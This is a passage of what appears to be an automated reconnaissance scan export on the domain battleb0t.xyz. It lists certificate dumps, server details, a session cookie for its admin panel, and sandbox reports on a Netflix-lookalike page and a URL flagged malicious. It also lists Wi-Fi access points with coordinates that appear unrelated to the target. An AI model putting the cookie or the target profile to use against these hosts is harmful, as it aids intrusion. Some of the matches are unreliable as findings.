X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
D9:CF:28:31:E6:B0:52:A6:B3:E5:82:F1:AF:FD:4B:16:99:CF:87:98
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nuke.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
9d:ff:c4:18:06:c7:30:d4:36:0f:0e:18:02:e1:f1:df:09:d5:
21:48:af:f9:5b:c3:31:1b:5f:2b:b6:70:3d:80:2b:58:d6:6f:
b5:cd:ce:70:10:56:ed:d2:2c:18:4d:d8:55:56:01:67:34:4f:
bc:a8:06:13:c7:63:73:41:9d:bd:7a:2d:d7:ed:6a:95:df:86:
a0:fd:bf:15:00:37:ee:c9:32:cd:29:05:23:5a:30:c7:ce:39:
29:07:6d:b0:2b:6a:1c:81:8f:29:05:30:c4:40:2c:ba:5f:67:
f5:56:a5:86:93:08:a2:16:e7:a9:15:01:13:84:23:08:70:b8:
b0:8e:c4:e6:9c:43:cf:99:85:ea:2e:4c:6c:a4:51:b4:75:a3:
cf:1f:af:40:ab:43:86:65:fb:ba:43:42:24:c7:fd:a0:13:49:
bf:fb:a3:fe:ef:4b:38:f1:34:bd:37:28:78:ae:eb:fe:f8:2c:
4d:b8:bd:50:64:c1:2a:97:b9:ac:34:8d:83:6a:c1:4b:6d:6a:
3a:8c:69:86:1e:d9:d4:69:98:23:cc:ff:1b:aa:4f:58:58:dd:
f4:2d:3e:92:9e:ec:9c:7f:4a:ba:35:54:c6:db:d8:38:08:1a:
75:fe:73:ca:92:d8:db:5e:94:c8:9a:15:84:e4:03:5b:a9:4b:
3c:ac:3c:70
| battleb0t.xyz |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | celikpalas (Net ID: 00:12:17:69:2A:A4) | 40.2024, 29.0398 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Noisette (Net ID: 00:0D:93:87:BE:5F) | 32.8608, -79.9746 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Mezzanine Airport (Net ID: 00:02:2D:0E:42:E3) | 37.7642, -122.3993 |
| 2023-05-12 02:48:31 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://dpcsit2024.github.io/Netflix', u'type': u'submitted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://dpcsit2024.github.io/Netflix', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_f10_IE_EarlyTabStart_0xba0_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "UpdatingNewTabPageData"\n "IsoScope_f10_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3856"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_f10_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_f10_ConnHashTable<3856>_HashTable_Mutex"\n "IsoScope_f10_IESQMMUTEX_0_303"\n "Local\\ZonesCacheCounterMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_f10_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, 
u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:443"\n "104.18.23.52:443"\n "142.250.191.74:443"\n "162.55.233.23:443"\n "45.57.90.1:443"\n "203.192.208.115:443"\n "142.250.189.227:443"\n "172.67.75.130:80"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"pngimg.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"assets.nflxext.com"\n "dpcsit2024.github.io"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "occ-0-4023-2164.1.nflxso.net"\n "pngimg.com"\n "pro.fontawesome.com"\n "www.freepnglogos.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"Watch anywhere, anytime, on an unlimited number of devices. 
Sign in with your Netflix account to watch instantly on the web at netflix.com from your personal computer or on any internet-connected device that offers the Netflix app, including smart TVs," (Indicator: "netflix.com")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "fa-light-300_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Pro Light family"- [targetUID: N/A]\n "fa-regular-400_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Pro Regular family"- [targetUID: N/A]\n "fa-solid-900_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Pro Solid family"- [targetUID: N/A]\n "AAAABVxdX2WnFSp49eXb1do0euaj-F8upNImjofE77XStKhf5kUHG94DPlTiGYqPeYNtiox-82NWEK0Ls3CnLe3WWClGdiJP_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "all_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "device-pile-in_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "IN-en-20210719-popsignuptwoweeks-perspective_alpha_website_small_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00003856]\n "netflix_PNG15_1_.png" has type "PNG image data 110 x 200 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLm21llEw_1_.woff" has type "Web Open Font Format TrueType length 76672 version 1.1"- [targetUID: N/A]\n "pxiGyp8kv8JHgFVrJJLedA_1_.woff" has 
type "Web Open Font Format TrueType length 76604 version 1.1"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLmv1plEw_1_.woff" has type "Web Open Font Format TrueType length 76404 version 1.1"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLmr19lEw_1_.woff" has type "Web Open Font Format TrueType length 76076 version 1.1"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLmy15lEw_1_.woff" has type "Web Open Font Format TrueType length 75364 version 1.1"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLmg1hlEw_1_.woff" has type "Web Open Font Format TrueType length 75268 version 1.1"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLm111lEw_1_.woff" has type "Web Open Font Format TrueType length 74932 version 1.1"- [targetUID: N/A]\n "pxiAyp8kv8JHgFVrJJLmE3tG_1_.woff" has type "Web Open Font Format TrueType length 72432 version 1.1"- [targetUID: N/A]\n "pxiDyp8kv8JHgFVrJJLm81xlEw_1_.woff" has type "Web Open Font Format TrueType length 71652 version 1.1"- [targetUID: N/A]\n "pxiEyp8kv8JHgFVrFJM_1_.woff" has type "Web Open Font Format TrueType length 66572 version 1.1"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-62', u'name': u'Communicates with HTTP webserver (GET/POST requests)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'Found http requests in header "GET /uploads/netflix/small/netflix_PNG15.png"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://dpcsit2024.github.io/Netflix"\n Pattern match: "https://dpcsit2024.github.io"\n Pattern match: 
"SUIDMmicrosoft.com/9216409460646431027691299872931531027574*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0E747&dmnchg=1microsoft.com/102433237894403108561027971357230938743*SRCHUSRDOB=202201"\n Pattern match: "https://fontawesome.com"\n Pattern match: "https://fontawesome.com/license"\n Pattern match: "https://pro.fontawesome.com/releases/v5.10.0/css/all.css"\n Pattern match: "https://fonts.googleapis.com"\n Pattern match: "https://fonts.gstatic.com"\n Pattern match: "https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap"\n Pattern match: "http://pngimg.com/uploads/netflix/small/netflix_PNG15.png"\n Pattern match: "https://www.freepnglogos.com/uploads/netflix-logo-0.png"\n Pattern match: "https://assets.nflxext.com/ffe/siteui/vlv3/9c5457b8-9ab0-4a04-9fc1-e608d5670f1a/710d74e0-7158-408e-8d9b-23c219dee5df/IN-en-20210719-popsignuptwoweeks-perspective_alpha_website_small.jpg"\n Pattern match: "https://assets.nflxext.com/ffe/siteui/acquisition/ourStory/fuji/desktop/tv.png"\n Pattern match: "https://assets.nflxext.com/ffe/siteui/acquisition/ourStory/fuji/desktop/video-tv-in-0819.m4v"\n Pattern match: "https://assets.nflxext.com/ffe/siteui/acquisition/ourStory/fuji/desktop/mobile-0819.jpg"\n Pattern match: "https://assets.nflxext.com/ffe/siteui/acquisition/ourStory/fuji/desktop/boxshot.png"\n Pattern match: "https://assets.nflxext.com/ffe/siteui/acquisition/ourStory/fuji/desktop/download-icon.gif"\n Pattern match: "https://assets.nflxext.com/ffe/siteui/acquisition/ourStory/fuji/desktop/device-pile-in.png"\n Pattern match: "https://assets.nflxext.com/ffe/siteui/acquisition/ourStory/fuji/desktop/video-devices-in.m4v"\n Pattern match: 
"https://occ-0-4023-2164.1.nflxso.net/dnm/api/v6/19OhWN2dO19C9txTON9tvTFtefw/AAAABVxdX2WnFSp49eXb1do0euaj-F8upNImjofE77XStKhf5kUHG94DPlTiGYqPeYNtiox-82NWEK0Ls3CnLe3WWClGdiJP.png?r=5cf"\n Pattern match: "SUIDMmicrosoft.com/9216409460646431027691299872931531027574*MUID1CB3868C84876AFA3427947A85CB6B98microsoft.com/1025422709568031106045299880744031027574*_EDGE_V1microsoft.com/9216422709568031106045299888556531027574*SRCHDAF=NOFORMmicrosoft.com/10243323789440"\n Pattern match: "https://fonts.gstatic.com/s/poppins/v20/pxiAyp8kv8JHgFVrJJLmE3tG.woff"\n Pattern match: "https://fonts.gstatic.com/s/poppins/v20/pxiDyp8kv8JHgFVrJJLmv1plEw.woff"\n Pattern match: "https://fonts.gstatic.com/s/poppins/v20/pxiDyp8kv8JHgFVrJJLm21llEw.woff"\n Pattern match: "https://fonts.gstatic.com/s/poppins/v20/pxiGyp8kv8JHgFVrJJLedA.woff"\n Pattern match: "https://fonts.gstatic.com/s/poppins/v20/pxiDyp8kv8JHgFVrJJLmg1hlEw.woff"\n Pattern match: "https://fonts.gstatic.com/s/poppins/v20/pxiDyp8kv8JHgFVrJJLmr19lEw.woff"\n Pattern match: "https://fonts | 185.199.110.153 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | BabyPips (Category: social)
https://forums.babypips.com/u/login/summary | login |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | FIS (Net ID: 00:02:2D:2E:39:1C) | 34.0544, -118.244 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | laethof_ipad (Net ID: 00:0C:E6:08:09:05) | 50.8897, 6.0563 |
| 2023-05-12 02:44:19 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Fastly | www.battleb0t.xyz |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SX5515722CD (Net ID: 00:01:E3:57:22:CD) | 52.3759, 4.8975 |
| 2023-05-12 03:03:37 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 00theway.github.io |
| 2023-05-12 02:55:27 | Web Server | No | URLScan.io | 0 | 1 | 1 | 0 | None | Werkzeug/2.2.2 Python/3.10.9 | battleb0t.xyz |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | laethof_ipad (Net ID: 00:0C:E6:08:1D:05) | 50.8897, 6.0563 |
| 2023-05-12 03:15:37 | Cookies | No | Cookie Extractor | 0 | 0 | 4 | 0 | None | CF_Session=nrj43fxpNUBlI2Utd; Path=/; Secure; Expires=Fri, 12 May 2023 06:54:22 GMT; HttpOnly; SameSite=none | {"cf-access-domain": "panel.battleb0t.xyz", "cf-ray": "7c5f606c5dec334e-EWR", "x-content-type-options": "nosniff", "content-security-policy": "frame-ancestors 'none'; connect-src 'self' http://127.0.0.1:*; default-src https: 'unsafe-inline'", "content-encoding": "gzip", "transfer-encoding": "chunked", "set-cookie": "CF_Session=nrj43fxpNUBlI2Utd; Path=/; Secure; Expires=Fri, 12 May 2023 06:54:22 GMT; HttpOnly; SameSite=none", "strict-transport-security": "max-age=31536000; includeSubDomains", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "x-xss-protection": "1; mode=block", "access-control-allow-credentials": "true", "date": "Fri, 12 May 2023 02:54:22 GMT", "access-control-allow-origin": "null", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "text/html", "x-frame-options": "DENY", "cf-version": "1432-d48eaba"} |
| 2023-05-12 02:54:59 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}, {u'url': u'https://zip.co/us/quadpay-terms-of-service', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 22, u'threat_score': 35, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://www.google.com/url?sa=t&rct=j&q&esrc=s&source=web&cd&cad=rja&uact=8&ved=2ahUKEwig6IWT_sf9AhUqFFkFHaLQDFEQFnoECFUQAQ&url=https%3A%2F%2Fendoflife.date%2Fsplunk&usg=AOvVaw3dNC2fVERURzevqzmzvgio', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-7', u'name': u'Loads modules at runtime', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1129', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" loaded module "%WINDIR%\\SYSTEM32\\UXTHEME.DLL" at base b2610000\n "msedge.exe" loaded module "COMBASE.DLL" at base b7470000\n "msedge.exe" loaded module "%WINDIR%\\SYSTEM32\\WINDOWS.SYSTEM.PROFILE.PLATFORMDIAGNOSTICSANDUSAGEDATASETTINGS.DLL" at base 9b8e0000\n "msedge.exe" loaded module "NTDLL.DLL" at base b7c80000\n "msedge.exe" loaded module "API-MS-WIN-DOWNLEVEL-SHELL32-L1-1-0.DLL" at base b6be0000\n "msedge.exe" loaded module "SHELL32.DLL" at base b57a0000\n "msedge.exe" loaded module "USER32.DLL" at base b7a50000\n "msedge.exe" loaded module "KERNEL32.DLL" at base b6e00000\n "msedge.exe" loaded module "API-MS-WIN-CORE-SYNCH-L1-2-0" at base b4ee0000\n "msedge.exe" loaded module "API-MS-WIN-CORE-FIBERS-L1-1-1" at base b4ee0000\n "msedge.exe" loaded module "ADVAPI32.DLL" at base b79a0000\n "msedge.exe" loaded module 
"API-MS-WIN-CORE-LOCALIZATION-L1-2-1" at base b4ee0000\n "msedge.exe" loaded module "KERNEL32" at base b6e00000\n "msedge.exe" loaded module "API-MS-WIN-CORE-STRING-L1-1-0" at base b4ee0000\n "msedge.exe" loaded module "API-MS-WIN-CORE-DATETIME-L1-1-1" at base b4ee0000\n "msedge.exe" loaded module "API-MS-WIN-CORE-LOCALIZATION-OBSOLETE-L1-2-0" at base b4ee0000\n "msedge.exe" loaded module "%PROGRAMFILES%\\(X86)\\MICROSOFT\\EDGE\\APPLICATION\\103.0.1264.37\\MSEDGE.DLL" at base 83910000'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-8', u'name': u'Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"19001a005601000040c705b5fd7f0000@ntdll.dll"\n "220023005601000018c705b5fd7f0000@ntdll.dll"\n "19001a00c224000040c705b5fd7f0000@ntdll.dll"\n "22002300c224000018c705b5fd7f0000@ntdll.dll"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\SM0:8176:120:WilError_01"\n "Local\\SM0:8000:304:WilStaging_02"\n "SM0:8000:304:WilStaging_02"\n "InternetShortcutMutex"\n "Local\\SM0:8000:120:WilError_01"\n "SM0:8000:120:WilError_01"\n "Local\\SM0:8176:304:WilStaging_02"\n "SM0:8176:304:WilStaging_02"\n "Local\\SM0:8176:120:WilError_01"\n "ChromeProcessSingletonStartup!"\n "SM0:8176:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:8176:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:8176:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:8176:304:WilStaging_02"\n 
"\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"35.185.199.199:443"\n "185.199.109.153:443"\n "185.199.108.154:443"\n "35.247.66.204:443"\n "172.64.100.2:443"\n "54.215.114.29:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"github.githubassets.com"\n "simpleicons.org"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-161', u'name': u'Contains ability to modify processes thread functionality (API string)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1106', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1106', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Observed API string:"OpenThread" [Source: 00000000-00008000.00000000.75945.B540F000.00000002.mdmp]'}, {u'category': u'Pattern Matching', u'origin': u'YARA Signature', u'identifier': u'yara-104', u'name': u'YARA signature match - RC4 Encryption', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1486', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1486', u'relevance': 5, u'threat_level': 0, u'type': 13, u'description': u'YARA signature for RC4 encryption matched on process "00000000-00008000"\n YARA signature for RC4 encryption matched on file "widevinecdm.dll"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': 
u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"85e41a97-0a51-45be-9701-9328a8cccce4.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\85e41a97-0a51-45be-9701-9328a8cccce4.tmp]- [targetUID: 00000000-00008176]\n "manifest.json" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\AutoLaunchProtocolsComponent\\1.0.0.8\\manifest.json]- [targetUID: 00000000-00008176]\n "d8456ed4-264e-4bfa-ae77-3dd1fbe61661.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\d8456ed4-264e-4bfa-ae77-3dd1fbe61661.tmp]- [targetUID: 00000000-00008176]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00008176]\n "manifest.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\AutoLaunchProtocolsComponent\\1.0.0.8\\manifest.json]- [targetUID: 00000000-00008176]\n "Filtering Rules" has type "data"- Location: [%TEMP%\\8176_2094895968\\Filtering Rules]- [targetUID: 00000000-00008176]\n "33ed44ec-5fb2-4ac5-bab9-e8b8484c6077.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\33ed44ec-5fb2-4ac5-bab9-e8b8484c6077.tmp]- [targetUID: 00000000-00008176]\n "f5020ad3-bd5d-4b77-9abd-2a7917f51814.tmp" has type "very short file (no magic)"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\f5020ad3-bd5d-4b77-9abd-2a7917f51814.tmp]- [targetUID: 00000000-00008176]\n 
"e4dc831f-30bb-481e-981e-d3749bdf7a0c.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\e4dc831f-30bb-481e-981e-d3749bdf7a0c.tmp]- [targetUID: 00000000-00008176]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00007284]\n "67fb2784defc193d_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\67fb2784defc193d_0]- [targetUID: 00000000-00008176]\n "temp-index" has type "zlib compressed data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\index-dir\\temp-index]- [targetUID: 00000000-00008176]\n "edge_checkout_page_validator.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\8176_1447454528\\edge_checkout_page_validator.js]- [targetUID: 00000000-00008176]\n "LOG" has type "ASCII text"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\EdgePushStorageWithConnectTokens\\LOG]- [targetUID: 00000000-00008176]\n "edge_driver.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\8176_1447454528\\edge_driver.js]- [targetUID: 00000000-00008176]\n "shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\8176_1447454528\\shopping.js]- [targetUID: 00000000-00008176]\n "deny_domains.list" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Web Notifications Deny List\\1.1.0.0\\deny_domains.list]- [targetUID: 00000000-00008176]\n "8b9637f5-42d7-41f4-9b8e-b22220cad0c0.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\8b9637f5-42d7-41f4-9b8e-b22220cad0c0.tmp]- [targetUID: 00000000-00006224]\n "Variations" has type "JSON data"- Location: 
[%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Variations]- [targetUID: 00000000-00008176]\n "04a120c2-8394-4261-bb45-618676a047cc.tmp" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Ad Blocking\\04a120c2-8394-4261-bb45-618676a047cc.tmp]- [targetUID: 00000000-00008176]'}, {u'category': u'Installation/Persistence', u'origin': u'File/Memory', u'identifier': u'string-184', u'name': u'Found registry | 185.199.109.153 |
| 2023-05-12 03:00:25 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.0): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | ASU (Net ID: 00:06:25:66:88:D8) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | <no ssid> (Net ID: 00:09:5B:6B:72:5C) | 39.0469, -77.4903 |
| 2023-05-12 02:48:30 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:10:8b:16:97:4c:80:e7:56:d7:06:74:1e:45:16:d2:cf:08
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 18 13:27:58 2022 GMT
Not After : Mar 18 13:27:57 2023 GMT
Subject: CN=panel.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
A8:1A:0A:B4:5A:C9:CB:04:98:CA:A0:D2:67:45:9B:9C:A4:98:23:12
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:panel.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
| battleb0t.xyz |
